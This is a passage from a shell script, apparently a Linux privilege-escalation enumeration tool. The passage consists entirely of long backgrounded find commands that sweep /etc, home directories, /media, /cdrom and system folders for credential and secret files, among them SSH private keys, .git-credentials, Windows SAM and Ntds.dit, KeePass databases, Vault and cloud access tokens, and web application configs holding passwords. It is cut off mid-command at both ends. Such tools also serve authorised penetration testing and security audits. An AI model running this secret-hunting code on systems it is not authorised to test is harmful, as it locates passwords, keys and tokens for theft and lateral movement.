\".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CACHE=`eval_bckgrd "find /.cache -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CDROM=`eval_bckgrd "find /cdrom -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_ETC=`eval_bckgrd "find /etc -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"*knockd*\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"ssh*config\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB=`eval_bckgrd "find /lib -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MEDIA=`eval_bckgrd "find /media -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name 